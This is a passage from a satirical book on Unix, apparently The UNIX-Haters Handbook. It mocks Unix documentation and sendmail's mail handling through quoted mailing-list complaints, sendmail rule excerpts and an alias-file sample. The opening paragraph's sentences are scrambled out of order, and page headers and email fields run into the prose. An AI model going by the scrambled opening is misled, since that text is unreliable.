” The real story was. Sometimes you find options described in the manual that are unimplemented and ignored by the source. The kernel was not documented because AT&T was protecting this sacred code as a “trade secret. Sure it was illegal. The Unix world acknowledges. Consultants. and system administrators didn’t copy the source code because they wanted to compile it and then stamp out illegal Unix clones: they made their copies because they needed the source code for documentation. . often having been written at different times and by different people than who wrote the code. it is all too common to turn to the source and find options and behaviors that are not documented in the manual. Sadly. the only way to get details about how the kernel or user commands worked was by looking at the source code. As a result. this is what the system uses for documentation when it decides what to do next! The manuals paraphrase the source code. Unix sources were widely pirated during the operating system’s first 20 years. Until very recently. there was simply no vendor-supplied documentation for writing new device drivers or other kernel-level functions. it hasn’t been very successful because of the underlying Unix documentation model established in the mid 1970s. The Source Code Is the Documentation As fate would have it. this sorry state of affairs. Life with Unix states the Unix attitude toward documentation rather matter-of-factly: The best documentation is the UNIX source. Think of them as guidelines.54 Documentation? invention. People joked “anyone needing documentation to the kernel functions probably shouldn’t be using them. in fact. Copies of Unix source code filtered out of universities to neighboring high-tech companies. programmers. but it does not apologize for. things are much worse. Sometimes they are more like wishes… Nonetheless. After all. And that’s for user programs.” Anyone who tried to write a book that described the Unix internals was courting a lawsuit. Inside the kernel. far more sinister. but it was justifiable felony: the documentation provided by the Unix vendors was simply not adequate. In the absence of written documentation. AT&T’s plan backfired.
. Writing this paragraph must have taken more work than fixing the bug would have. From man man: DIAGNOSTICS If you use the -M option. The fact is. pp. everything held together by chewing gum and duct tape.edu> UNIX-HATERS I love this. If you type: man -M /usr/foo ls you get the error message “No manual entry for ls. Not Users 55 This is not to say that the source code contained worthwhile secrets. It’s easy to spot the work of a sloppy handyman: you’ll see paint over cracks. and writing computer programs in particular. Register variables with names like p. AT&T’s institutional attitude toward documentation for users and programmers was indicative of a sloppy attitude toward writing in general. the error message is somewhat misleading. which was a nightmare of in-line hand-optimizations and micro hacks. Comments like “this function is recursive” as if recursion is a difficult-to-understand concept. 17 May 90 14:43:28 -0700 David Chapman <zvona@gang-of-four. Anyone who had both access to the source code and the inclination to read it soon found themselves in for a rude surprise: /* You are not expected to understand this */ Although this comment originally appeared in the Unix V6 kernel source code. Face it: it takes thinking and real effort to re-design and build something over from scratch.For Programmers. it could easily have applied to any of the original AT&T code. and ppp being used for multitudes of different purposes in different parts of a single function. and name a directory that does not exist.” You should get an error message indicating that the directory /usr/foo does not exist.stanford. Date: From: To: Thu. Suppose the directory /usr/foo does not exist. patch over patch.
and that my dependence on it is artificial. CONTENTS: 1 Forwarded to UNIX-HATERS by Judy Anderson. with professional help. And what’s more. and get out of this parasitic profession. 24 Apr 92 12:58:28 PST cj@eno. OVERVIEW: Gives a general strategy for approaching Unix without documentation. Here’s my proposal: TITLE: “Unix Without Words” AUDIENCE: The Unix novice. I see this book as transitional only. I never posted it. I’ve become convinced that documentation is a drug.bizarre1 Unix Without Words [During one particularly vitriolic flame war about the uselessness of documentation.] Unix Ohne Worter Well! I’ve been completely convinced by the arguments presented here on the uselessness of documentation. I wrote the following proposal.sgi.corp. . In fact. but I do see the need for SGI to ship one document with our next release. I’ve decided to go back to math grad school to reeducate myself. because I am a coward… I finally post it here. I feel morally obliged to cease peddling this useless drug for a living. Perhaps it just reveals the depth of my addiction to documentation. for your edification. Presents generalizable principles useful for deciphering any operating system without the crutch of documentation.56 Documentation? Unix Without Words: A Course Proposal Date: From: Organization: Newsgroups: Subject: Fri.com (C J Silverio) SGI TechPubs talk. We can eliminate it for the following release. I can overcome my addiction.
Unix Without Words: A Course Proposal 57 INTRO: overview of the ‘no doc’ philosophy why manuals are evil why man pages are evil why you should read this book despite the above “this is the last manual you'll EVER read!” guessing which commands are likely to exist guessing what commands are likely to be called unpredictable acronyms the Unix way usage scenario: “grep” guessing what options commands might take deciphering cryptic usage messages usage scenario: “tar” guessing when order is important usage scenario: SYSV “find” figuring out when it worked: silence on success recovering from errors the oral tradition: your friend obtaining & maintaining a personal UNIX guru feeding your guru keeping your guru happy the importance of full news feeds why your guru needs the fastest machine available free Coke: the elixir of your guru’s life maintaining your guru’s health when DO they sleep? troubleshooting: when your guru won’t speak to you identifying stupid questions safely asking stupid questions accepting your stress coping with failure CHAP 1: CHAP 2: CHAP 3: CHAP 4: CHAP 5: CHAP 6: CHAP 7: CHAP 8: ---------- .
maybe only chapters 6 & 7 are really necessary.58 Documentation? (Alternatively. that’s the ticket: we'll call it The Unix Guru Maintenance Manual.) . Yeah.
Unix Without Words: A Course Proposal 59 .
60 .
it would be up more often (with a minor loss in functionality).-----Q-Time----. sometimes the mailer gives a totally incomprehensible error indication. 26 Mar 92 21:40:13 -0800 Alan Borning <borning@cs.ca What on earth does this mean? Of course a Unix system isn’t a typewriter! If it were.newprod Date: From: To: Subject: Thu. comp. I’m Not a Typewriter! Not having sendmail is like not having VD. .uvic.: Mail Queue (1 request) --QID-. viz.edu> UNIX-HATERS Deferred: Not a typewriter When I try to send mail to someone on a Unix system that is down (not an uncommon occurrence). —Ron Heiby Former moderator.--Size-.--------Sender/Recipient-------AA12729 166 Thu Mar 26 15:43 borning (Deferred: Not a typewriter) bnfb@csr.4 Mail Don’t Talk to Me.washington.
scrc. I tried talking to a postmaster at a site running sendmail. I mean. You see. But on this message.com (Stephen J. actually. 13 May 1991 21:28 EDT From: silv@upton. we have edited gross mail headers for clarity. Silver)1 To: mit-eddie!STONYBROOK. the headers of the replies I got back from his site came out mangled. Seriously: how hard can it be to parse an address. whenever I sent mail to people at his site. and that’s good enough. If not.Symbolics.com> To: UNIX-HATERS Subject: harder!faster!deeper!unix Remember when things like netmail used to work? With UNIX.COM!CStacy@EDDIE. Date: From: Wed. we decided to leave this site’s sendmail’s handiwork in all its glory—Eds. fine. Our system mailer did it. 15 May 1991 14:08-0400 Christopher Stacy <CStacy@stony-brook. resolve aliases. things sorta work. what is wrong? Just does not look nice? I am not a sendmail guru and do not have 1 2 Pseudonym. It looked like maybe the problem was at his end—did he concur? This is what he sent back to me: Date: Mon.symbolics. If you got it.EDU 2 Subject: Re: mangled headers No doubt about it. and I couldn’t reply to their replies. and then wrote programs that followed the protocol.MIT. electronic mail simply worked. and either send out or deliver a piece of mail? Quite hard. isn’t it? What’s wrong with a little unreliability with mail? So what if you can’t reply to messages? So what if they get dropped on the floor? The other day. Locally. if your operating system happens to be Unix. people really don’t expect things to work anymore.SCRC. most of the time. they created simple and intuitive systems for managing mailing lists and mail aliases. The administrators at different network sites agreed on a protocol for sending and receiving mail. .62 Mail Sendmail: The Vietnam of Berkeley Unix Before Unix. how did you know? If you got it. Throughout most of this book.
sendmail was better than the Unix mail program that it replaced: delivermail. in 20 years. I don’t understand why. Fortunately.com UNIX-HATERS sendmail made simple I was at a talk that had something to do with Unix.” The program was developed as a single “crossbar” for interconnecting disparate mail networks. and it is likely to remain the standard Unix mailer for many. Mail sorta works. . most of the time. Good Luck.2 Unix distribution as BSD’s “internetwork mail router. nobody in the Unix world has been able to get it right once. 12 Oct 93 10:31:48 -0400 dm@hri. A Harrowing History Date: From: To: Subject: Tue. none of them simultaneously enjoy sendmail’s popularity or widespread animosity. BerkNet and ARPANET (the precursor to Internet) networks. Although other mailers (such as MMDF and smail) have been written. Yet the author of sendmail is still walking around free without even a U (for Unixery) branded on his forehead. Sendmail was written by Eric Allman at the University of Berkeley in 1983 and was included in the Berkeley 4. I’ve succeeded in repressing all but the speaker’s opening remark: I’m rather surprised that the author of sendmail is still walking around alive. Allman defined eight goals for sendmail: 1. and given the time I have. Despite its problems. many years. The thing that gets me is that one of the arguments that landed Robert Morris. Sendmail had to be compatible with existing mail programs. In his January 1983 USENIX paper. Sendmail is the standard Unix mailer.Sendmail: The Vietnam of Berkeley Unix 63 one. that is great. Stephen Silver Writing a mail system that reliably follows protocol is just not all that hard. In its first incarnation. sendmail interconnected UUCP. author of “the Internet Worm” in jail was all the sysadmins’ time his prank cost.
Instead we have sendmail. Sendmail had to let various groups maintain their own mailing lists and let individuals specify their own mail forwarding.64 Mail 2. never losing a mail message. it had to be programmable so that it could handle any possible changes in the standards. 6. the Internet mail standards have been decided upon and such flexibility is no longer needed. should anyone have a sudden urge. 3. Network traffic had to be minimized by batching addresses to a single host when at all possible. “Sendmail Revisited” admits that bundling so much functionality into a single program was probably a mistake: certainly the SMTP server. Delve into the mysteries of sendmail’s unreadable sendmail. Sendmail is one of those clever programs that performs a variety of different functions depending on what name you use to invoke it. but had to be read at startup.) Sendmail was built while the Internet mail handling systems were in flux. Sometimes it’s the good ol’ sendmail. Sendmail had to be reliable. That was great in 1985. Sendmail’s configuration could not be compiled into the program. Sendmail had to work in both simple and extremely complex environments. . which continues to grow beyond all expectations. all of sendmail’s rope is still there. 8. other times it is the mail queue viewing program or the aliases database-builder. As a result. Existing software had to do the actual message delivery if at all possible. In 1994. ready to make a hangman’s knot. and alias database management system should have been handled by different programs (no doubt carrying through on the Unix “tools” philosophy). Nevertheless. mail queue handler. 7.cf files and you’ll discover ways of rewiring sendmail’s insides so that “@#$@$^%<<<@#) at @$%#^!” is a valid e-mail address. (An unstated goal in Allman’s 1983 paper was that sendmail also had to implement the ARPANET’s nascent SMTP (Simple Mail Transport Protocol) in order to satisfy the generals who were funding Unix development at Berkeley. 4. Each user had to be able to specify that a program should be executed to process incoming mail (so that users could run “vacation” programs). without having individuals or groups modify the system alias file. 5.
. It’s probably necessary to go into this level of detail for some of the knuckle-draggers who are out there running machines on the Internet these days. But I digress. the Roman alphabet only had 26 characters) and messages encoded in it get hopelessly munged when the 8th bit gets stripped off. I see: Q: Why does the Costales book have a bat on the cover? A: Do you want the real answer or the fun answer? The real answer is that Bryan Costales was presented with a choice of . so that increasingly incompetent Weenix Unies can install and misconfigure increasingly complex software. It comes with an FAQ document. Apparently. and Rickert. I don’t think so. Sendmail. Have you seen this book? It has more pages than War and Peace. in the actual “Questions” section.intercon. Isn’t it nice that we have FAQs. Then. I’m not arguing that stripping the high bit is a good thing.com> UNIX-HATERS intelligent? friendly? no. which is even more scary. Much to my chagrin.177 air pistol at point-blank range before it penetrates even halfway into the book (. and that the ISO people shouldn’t have had their heads so firmly implanted in their asses. O’Reilly & Associates. It will stop a pellet fired from a . below. just that it’s the standard.6. 6 Feb 94 14:17:32 GMT Robert Seastrom <rs@fiesta.. the increasingly popular ISO/LATIN1 encoding format is 8-bit (why? last I checked. More pages than my TOPS-10 system calls manual. I’ve recently received requests from folks at my site to make our mailer non-RFC821-compliant by making it pass 8bit mail. and sometimes even diagnose problems that once upon a time would have required one to <gasp> read the source code! One of the books it recommends for people to read if they want to become Real Sendmail Wizards is: Costales.22 testing next weekend).Sendmail: The Vietnam of Berkeley Unix 65 Date: From: To: Subject: Sun. But what do you expect from the people who brought us OSI? So I decided to upgrade to the latest version of Berzerkly Sendmail (8.5) which reputedly does a very good job of not adhering to the standard in question. and that we have standards for a reason. Allman.
I can come up with tons of better answers to that one. • Have you ever watched a bat fly? Have you ever watched Sendmail process a queue full of undelivered mail? QED. To wit: • The common North American brown bat’s diet is composed principally of bugs. • Sendmail and bats both suck. a principal ingredient in things that blow up in your face. making “eep eep” noises which are incomprehensible to the average person. it is really a rather friendly and intelligent beast. like a bat.$*?$+ R<$+>$+. Especially because it’s so patently wrong. Friendly and intelligent? Feh. although sendmail has a reputation for being scary.$*?$+ R<$+>:$+ R<$=X$-.$4 Change do user@domain . • Both bats and sendmail are held in low esteem by the general public. Sendmail is a software package which is composed principally of bugs. • Bat guano is a good source of potassium nitrate. domain $@<$1$2.UUCP>!?$+ R<$=X$->!?$+ R<$+>$+?$+ R<$+. and he picked the bat because it appealed to him the most.$+>$=Y$+ $:<$1>$2$3?$4$5 Mark user portion. <$1>$2!$3!$4?$5 is inferior to @ <$1>$2:$3?$4 Change src rte to % path <$1>. Sendmail likewise requires mystical incantations such as: R<$+>$*$=Y$~A$* R<$+>$*!$+.$2>. • Sendmail maintainers and bats both tend to be nocturnal creatures.66 Mail three pictures. Like Sendmail. The fun answer is that. • Bats require magical rituals involving crosses and garlic to get them to do what you want.$2 Change % to @ for immed.UUCP>!$3 Return UUCP $@<$1$2>!$3 Return unqualified <$1>$2$3 Remove '?' $@<$1. • Sendmail and bats both die quickly when kept in captivity.
Subject: Returned Mail: User Unknown 67 • Farmers consider bats their friends because of the insects they eat. Stay tuned for the . Decompose the address into two parts: a name and a host (much as the U. a street+number.22 penetration test results! —Rob Subject: Returned Mail: User Unknown A mail system must perform the following relatively simple tasks each time it receives a message in order to deliver that message to the intended reciepient: 1. but I think you get the idea. Figure out which part of the message is the address and which part is the body. I could go on and on. 2.S. 3. send the message to the specified host. Farmers consider Sendmail their friend because it gets more collegeeducated people interested in subsistence farming as a career. Postal System decomposes addresses into a name.) If the destination host isn’t you. . and town+state.
media.edu> Sidewalk obstruction msgs@media.media. It’s not so easy for Unix. 16 Oct 91 17:33:07 -0400 Thomas Lawrence <thomasl@media-lab. will.mit.edu> msgs@media.front.mit. This is easy for humans.building. and that the body of the message is about some logs on the sidewalk outside the building.mit.edu Sidewalk obstruction The logs obstructing the sidewalk in front of the building will be used in the replacement of a collapsing manhole. Otherwise.mit.be. They will be there for the next two to three weeks.in.media.the.of.68 Mail 4.mit. We have no trouble figuring out that this message was sent from “Thomas Lawrence. 16 Oct 91 17:29:01 -0400 Thomas Lawrence <thomasl@media-lab. STEP 1: Figure out what is address and what is body.sidewalk.in.the@media-lab.edu The@media-lab.the.obstructing.” is meant for the “msgs” mailing list which is based at the MIT Media Lab. which manages to produce: Date: From: Subject: To: Cc: Wed.used.media. take the following message: Date: From: To: Subject: Wed. logs.edu.edu On occasion. Sendmail manages to blow every step of the process. use the name to figure out which user or users the message is meant for. For example. sendmail has been known to parse the entire body of a message (sometimes backwards!) as a list of addresses: .mit. and put the message into the appropriate mailboxes or files.
fr tel:76 57 46 68 (33)> Apparently-To: <PS:I’ll summarize if interest. Unfortunately.symbolics.EDU> Apparently-To: <Thanks in advance@Neon.com> UNIX-HATERS Mailer error of the day. When Joe Smith on machine A wants to send a message to Sue Whitemore on machine B. maybe users wouldn’t have been so flagrant in the addresses they compose.EDU> Apparently-To: <for temporal logics.@Neon.scrc. . Maybe netmail would work reliably once again. Just the same. The at-sign (@) is for routing on the Internet. At times. Maybe they would demand that their system administrators configure their mailers properly.etc. If sendmail weren’t so willing to turn tricks on the sender’s behalf.Stanford.uucp.Stanford. 8 Jul 1992 11:01-0400 Judy Anderson <yduJ@stony-brook. since sendmail itself is the victim of multiple Unix “standards.Subject: Returned Mail: User Unknown 69 Date: Thu.Stanford. and percent (%) is just for good measure (for compatibility with early ARPANET mailers).EDU> STEP 2: Parse the address.EDU> Apparently-To: <I’m interested in gentzen and natural deduction style axiomatizations@Neon.EDU Comment: Redistributed from CS. It’s up to sendmail to parse this nonsense and try to send the message somewhere logical.Comments and references are welcomed. 13 Sep 90 08:48:06 -0700 From: MAILER-DAEMON@Neon. no matter where you were sending the mail to or receiving it from.Stanford.Stanford. sendmail is partially responsible for promulgating the lossage. it has (at least) three separation characters: “!”. “@”.Stanford. the exclamation point (!) (which for some reason Unix weenies insist on calling “bang”) is for routing on UUCP. and “%”.EDU Apparently-To: <Juan ECHAGUE e-mail:jve@lifia.imag.EDU> Apparently-To: <Juan@Neon. Parsing an electronic mail address is a simple matter of finding the “standard” character that separates the name from the host.@Neon.Stanford. it’s hard not to have pity on sendmail. sometimes sendmail goes too far: Date: From: To: Subject: Wed. he might generate a header such as Sue@bar!B%baz!foo.” Of course. since Unix believes so strongly in standards.
But sendmail isn’t that smart: it needs to be specifically told that John Doe. while it is in the processing of compiling its alias file into binary format. like “it’s from the dark ages of computing.” “John Q.” but we can’t: alias files worked in the dark ages of computing. So what did the Unix mailer do with this address when I tried to reply? Why it turned “at” into “@” and then complained about no such host! Or was it invalid address format? I forget. Sendmail not only has a hopeless file format for its alias database: many versions commonly in use refuse to deliver mail or perform name resolution. such as Carnegie Mellon University’s Andrew System.” electronic mail systems handle multiple aliases for the same person. which specifies the mapping from the name in the address to the computer user. . John Q. up-to-date alias files that are riddled with problems. sendmail is a little unclear on the concept. Alias files are rather powerful: they can specify that mail sent to a single address be delivered to many different users. Kim. Just as the U. Doe. the name “QUICHE-EATERS” might be mapped to “Anton. Doe are actually all the same person. We’d like to say something insulting. Mailing lists are created this way. do this automatically. …Or perhaps sendmail just thinks that Judy shouldn’t be sending e-mail to Austria. Doe. For example. and J.at” domain. there are so many different ways to lose. Postal Service is willing to deliver John Doe’s mail whether it’s addressed to “John Doe. Seems I got mail from someone in the “.S. This is done with an alias file. and Bruce. Figure 1 shows an excerpt from the sendmail aliases file of someone who maintained systems then and is forced to use sendmail now. and its alias file format is a study in misdesign. Unfortunately.70 Mail I had fun with my own mailer-error-of-the-day recently.” or “J. Advanced electronic mail systems. STEP 3: Figure out where it goes. Aliases files are a natural idea and have been around since the first electronic message was sent. Doe. It is sendmail’s modern.” Sending mail to QUICHE-EATERS then results in mail being dropped into three mailboxes.
edu" # domain must have fully qualified host names.edu". # WELCOME TO THE WORLD OF THE FUTURE # # # Special note about large lists: # It seems from empirical observation that any list defined IN THIS # FILE with more than fifty (50) recipients will cause newaliases to # say "entry too large" when it's run.) # # [Note this command won't -necessarily. This also probably means that you cannot stick a comment # in the middle of a list definition (even on a line by itself) and # expect the rest of the list to be properly processed. Thus. and your # username is johnq.stick a comment at the end of a # line by simply prefacing it with a "#". The workaround is to use:include # files as described elsewhere.mit. you must use "xx.mit. "xx" is not a # legal host name. It # will cause major lossage to just use "johnq". if you receive your mail on wheaties. 11 Apr 91 13:00:22 EDT Steve Strassmann <straz@media-lab. and disfigurement .mit. rather than interpreting it as a comment. This means.tell one whether the # mailinglists file is syntactically legal -. type m-x compile in Emacs after editing this file. Thus. # WELCOME TO THE WORLD OF THE FUTURE # ################################################################### FIGURE 1. # WELCOME TO THE WORLD OF THE FUTURE. Excerpts From A sendmail alias file Date: From: To: Subject: Thu. Adding the fifty-first recipient to the # list will cause this error. It doesn't tell you -which# list is too big. which is # incorrect. If they don't. unfortunately. but if you've only been editing # one.edu> UNIX-HATERS pain. # This format limits the length of each alias to the internal block # size (1K). death. Instead. The mailer (or newaliases) # will think that you mean an address which just so happens to have # a "#" in it. which seem to have much larger or # infinite numbers of recipients allowed. that you cannot stick comments on the same line as # any code.it might just silently # trash the mail system on all of the suns. [The actual problem is # that this file is stored in dbm(3) format for use by sendmail.] # # Special note: Make sure all final mailing addresses have a host # name appended to them.Subject: Returned Mail: User Unknown 71 ############################################################### # # READ THESE NOTES BEFORE MAKING CHANGES TO THIS FILE: thanks! # # Since aliases are run over the yellow pages. you must issue the # following command after modifying the file: # # /usr/local/newaliases # (Alternately. use "johnq@wh" as your address.lcs. One other point to # keep in mind is that any hosts outside of the "ai. sendmail will attach the # Yellow Pages domain name on as the implied host name.] # WELCOME TO THE WORLD OF THE FUTURE # # Special note about comments: # Unlike OZ's MMAILR. you -CANNOT. # essentially. you have some clue.
Because Unix lies in so many ways. because few people know that the mail has been lost. You see.72 Mail Sometimes. what should sendmail do? Obviously. choke on perilous whitespace. As the alias list is pronounced dead on arrival. But only sometimes. How could it? That would require it to actually comprehend what it reads. actually. but evidently Unix cannot afford to keep the old. And then. bone. If you send mail to an alias like ZIPPER-LOVERS which is at the end of the file. and the old version—the last known version that actually worked—is simply lost forever. Unix must be appreciated at just the right moment. it would be trivial. you can send mail to a mailing list. STEP 4: Put the mail into the correct mailbox. It will merrily ignore typos. sendmail just silently throws the mail away. newaliases processes /usr/lib/aliases like so much horse meat. Usually these messages are very personal. the new mail database has some new bugs. and do whatever it wants with comments except treat them as comments. Few people can complain about this particular sendmail mannerism. and all. skin. For example. On other occasions. that would require. Don’t you wish? Practically everybody who has been unfortunate enough to have their messages piped through sendmail had a special message sent to the wrong reciepient. And the person who sent mail to a valid address gets it bounced back. it is virtually impossible to debug this system when it silently deletes mail: . and because sendmail is so fragile. But not if someone else just happens to be running newaliases at the moment. Unix just isn’t up to the task. And the person who made the changes is not warned of any bugs. like a rare fungus. when it’s done. Other times. sendmail will happily tell you your addressee is unknown. while it’s still gurgitating on ACME-CATALOG-REQUEST. usable version around while the new one is being created. Never mind. You see. I guess it would be too hard for the mailer to actually wait for this sausage to be completed before using it. treat it as gospel. sendmail simply gets confused and can’t figure out where to deliver mail. and somehow uncanningly sent to the precise person for whom receipt will cause the maximum possible damage. and report practically no errors or warnings. uh.
No barf. I just give up. never mind that it already knew the owner because it accepted the damn mail in the first place. it disappeared. is this new user. I round up the usual suspects.” the owner is this guy named “000000058. some of you might be saying. Sure enough. But mine aren’t owned by “straz. in their proper order. Like today. Mailer looks in /etc/passwd before queuing up the mail. on line 3 of the password file. so it decided “straz” simply wasn’t there. I try “ps -ef” to look at some processes. Right there.mit. I said it. Oh no. when I sent her a message. all right. solving another unrelated Unix problem. innocent user asked me why she suddenly stopped getting e-mail in the last 48 hours. whoever was fetching my name on behalf of ps can’t read past a blank line. no error. 30 Apr 91 02:11:58 EDT Steve Strassmann <straz@media-lab. sometimes twice a day? Why is he so filled with bile? To all these questions there’s a simple answer: I use Unix.edu> UNIX-HATERS Unix and parsing You know. But that means—you guessed it. You see Unix knows parsing like Dan Quayle knows quantum mechanics. This new user. followed by (horrors!) a blank line. So what did it do? Handle it the Unix way: Throw the message away without telling anyone and hope it wasn’t important! So how did the extra blank line get there in the first place? I’m so glad you asked. plain to you or me. But when it actually came down to putting the message someplace on the computer like /usr/mail/. so there’s no need to bounce incoming mail with “unknown user” barf. Hours later. but not to Unix. just gone. it couldn’t read past the blank line to identify the owner. she gets and reads her mail on my workstation.Subject: Returned Mail: User Unknown 73 Date: From: To: Subject: Tue. A poor. Her name was in /etc/passwd. Followed by all the other entries. A blank line.” Time to look in /etc/ passwd. with accounts on the main Media Lab machine. but after an hour between the man pages for sendmail and other lossage. why does this straz guy send so much mail to UNIX-HATERS? How does he come up with new stuff every day. hell. Unlike most users. was added by a well-meaning colleague using ed 3 from a terminal with . for example. who preceded the blank line.
your mailman may not always see the message—maybe it’s raining. maybe someone’s trash cans are in front of it. BBN Beyond blowing established mail delivery protocols. Suppose that you have changed your home residence and want your mail forwarded automatically by the post office. we’re not inventing this stupider method: Unix did. Every time. more importantly.74 Mail some non-standard environment variable set so he couldn’t use Emacs or vi or any other screen editor so he couldn’t see there was an extra blank line that Unix would rather choke dead on than skip over. he doesn’t put your mail in your mailbox. They call that note near your mailbox a . There’s another. he slaps the new address on it and sends it on its way to its new home. The rational method is the method used now: you send a message to your local postmaster. And it frequently happens.edu> The problem with sendmail is that the sendmail configuration file is a rule-based expert system. less robust method for rerouting mail: put a message near your mailbox indicating your new address. Unix has invented newer. Now. The flaws in this approach are obvious. he slaps the new address on it and takes it back to the post office. especially in these distributed days in which we live. he misdelivers your mail into your old mailbox. such as mail forwarding. —David Waitzman. there’s lots of extra overhead. that the mailer misses the forwarding note and dumps your mail where you don’t want it. and you never see it again unless you drive back to check or a neighbor checks for you. who maintains a centralized database. more up-to-date methods for ensuring that mail doesn’t get to its intended destination. Instead. but the world of e-mail is not logical.forward file. . But. 3 “Ed is the standard Unix editor.” —Unix documentation (circa 1994). When your mailman sees the message. maybe he’s in a rush. From: <MAILER-DAEMON@berkeley. When this happens. and sendmail configuration editors are not experts. When the postmaster receives mail for you. That’s why. For one.
I also have the mail-address field in my inquir entry set to “Alan@AI.forward file. The next day.forward file and the inquir entry?) … Apparently the answer to this is “yes. do I need one of those in addition to the .ai. the mailer can’t find your .From: <MAILER-DAEMON@berkeley. (I don’t have a personal entry in the aliases file. I don’t want to receive mail on a Unix. 7 Oct 88 14:44 EDT Alan Bawden <alan@ai.mit. because in fact I don't have any mail accumulating in some dark corner of the file system. I am told that I have mail.forward file and the inquir entry?) So could someone either: A. it tells me that I have mail. do I need one of those in addition to the .” If the file server that contains your home directory is down. and fix it so that this never happens again. I don’t have a mailbox in my home directory on the Suns.” Now as near as I can tell.forward file in my home directory says to do. or B. 6 Oct 88 22:50:53 EDT From: Alan Bawden <alan@ai.mit. .” Nevertheless. but perhaps Unix keeps mailboxes elsewhere? If I send a test message to “alan@wheaties” it correctly finds its way to AI. Find that mail and forward it to me. Alan answered his own query: Date: From: To: Subject: Fri. Tell me that I should just ignore the “You have mail” message. I want my mail to be forwarded to “Alan@AI. 6 Oct 88 22:50:53 EDT Alan Bawden <alan@ai. whenever I log into a Sun.edu> SUN-BUGS UNIX-HATERS I have mail? Whenever log into a Sun.edu> … (I don’t have a personal entry in the aliases file. just as the .edu> UNIX-HATERS I have mail? Date: Thu. Thanks.edu> 75 Date: From: To: Cc: Subject: Thu.mit.
such as to the mailbox down the street or to your friend. a neighborhood of computers sharing a network cable often come from disparate places and speak disparate languages. for communication. but the real story is a little more complicated because you can ask your mail program to do tasks you could never ask of your mailman. but we’re not. I guess the . Let’s suppose further that the recipient marks “Return to sender” on the letter.forward file in your home directory is just a mechanism to make the behavior of the Unix mailer more unpredictable. There are published protocols. when responding to an electronic letter. Then you can use Unix and verify lossage caused by Unix’s unwillingness to follow protocol. but that you mailed it from the mailbox down the street. called a protocol. Africa.S. Neither the jerk nor Unix follows the rules. Asia. an unintelligent system would return the letter to where it was mailed from. An intelligent system would return the letter to the return address. That system mimicking a moldy avocado is.76 Mail so mail is delivered into /usr/spool/mail/alan (or whatever). and South America. Postal Service that has your return address on it. of course. Just as a neighborhood of people sharing a street might be composed of people who came from Europe. play the stereo too loudly. For example. Just as those people who share the street make up a common language for communication. you have to put a personal entry in the aliases file. an antisocial and illegal behavior of sendmail is to send mail to the wrong return address. the computers are supposed to follow a common language. Both turn over trash cans. and attract wimpy sycophants who bolster their lack of power by associating with the bully. or you gave it to a friend to mail for you. you don’t have to mail the return enve- . This strategy generally works until either a jerk moves onto the block or a Unix machine is let onto the network. So if you really don’t want to learn how to read mail on a Unix. You can look them up in the computer equivalent of city hall— the RFCs. make life miserable for everyone else. I wonder what it does if the file server that contains the aliases file is down? Not Following Protocol Every society has rules to prevent chaos and to promote the general welfare. For example. We wish that we were exaggerating. Unix. Let’s say that you send a real letter via the U.
being the nitpickers with elephantine memories that they are. complaining that the fault lied not with himself or sendmail.MIT.LCS.EDU: From: To: Devon Sean McCullough <devon@ghoti. . keep track not only of who a response should be sent to (the return address.MIT.EDU and not to the address PAGANISM@MC. but with the PAGANISM digest itself: Date: From: To: Sun.lcs. Or else the digest is screwed up.mit.LCS. The computer rules clearly state that to respond to an electronic message one uses the “Reply-to” address. For example. 27 Jan 91 11:28:11 PST <Paganism Digest Subscriber> Devon Sean McCullough <devon@ghoti. or save it somewhere and go thru some contortions to link the edited file to the old echoed address. Many versions of Unix flaunt this rule. consider this sequence of events when Devon McCullough complained to one of the subscribers of the electronic mailing list called PAGANISM4 that the subscriber had sent a posting to the e-mail address PAGANISM-REQUEST@MC. but where it was mailed from (kept in the “From:” field). —Devon The clueless weenie sent back the following message to Devon.mit. misassigning blame for its bad behavior to working software.From: <MAILER-DAEMON@berkeley. The interpretation of which is all too easy to understand: 4 Which has little relation to UNIX-HATERS. Those who religiously believe in Unix think it does the right thing. much as Detroit blames Japan when Detroit’s cars can’t compete. you could try sending it again.edu> >From my perspective. the computer does it for you. called in computer parlance the “Reply-to:” field).edu> 77 lope yourself. using the ‘From:’ line instead.lcs. Either you or your ‘r’ key screwed up here. Why make me go to all that trouble? This is the main reason that I rarely post to the PAGANISM digest at MIT. Computers. not the “From” address. So the only way for me to get the correct address is to either back-space over the dash and type the @ etc in. wrecking havoc on the unsuspecting. Anyway. Berkeley Unix Mail is what I use. and it ignores the ‘Reply-to:’ line. the digest is at fault. not PAGANISM.edu> <PAGANISM Digest Subscriber> This message was sent to PAGANISM-REQUEST.
This seems only civilized. of course. with Love We have laws against the U. 28 Jan 91 18:54:58 EST Alan Bawden <alan@ai. On the other hand. But Unix feels regally endowed to change a message's contents. and the sender didn't put it there. as pointed out in the following message: . but can’t open it up and change the contents. For example. Sendmail put it there. It can scribble things on the envelope.S. It should be noted that this particular feature of Berkeley Mail has been fixed. Berkeley Unix Mail.edu> UNIX-HATERS Depressing Notice the typical Unix weenie reasoning here: “The digestifier produces a header with a proper Reply-To field. did you notice the little “>” in the text of a previous message? We didn’t put it there. Yes.” Frankly. contrary to all standards.78 Mail Date: From: To: Subject: Mon. Unix disregards the law. >From Unix. RFC822 way. it’s against the computer law. The Internet Engineering Task Force (IETF) has embarked on an effort to rewrite the Internet’s RFC “standards” so that they comply with the Unix programs that implement them. It’s pervasive.” Therefore: “The digestifier is at fault.mit. ignores the Reply-To field and incorrectly uses the From field instead. Postal Service modifying the mail that it delivers. I think the entire human race is doomed. We haven’t got a snowball’s chance of doing anything other than choking ourselves to death on our own waste products during the next couple hundred years. standard. and unlike all reasonable mail reading tools. the attitude that the Unix implementation is a more accurate standard than the standard itself continues to this day. in the expectation that your mail reading tool will interpret the header in the documented. Mail now properly follows the “Reply-To:” header if it is present in a mail message.
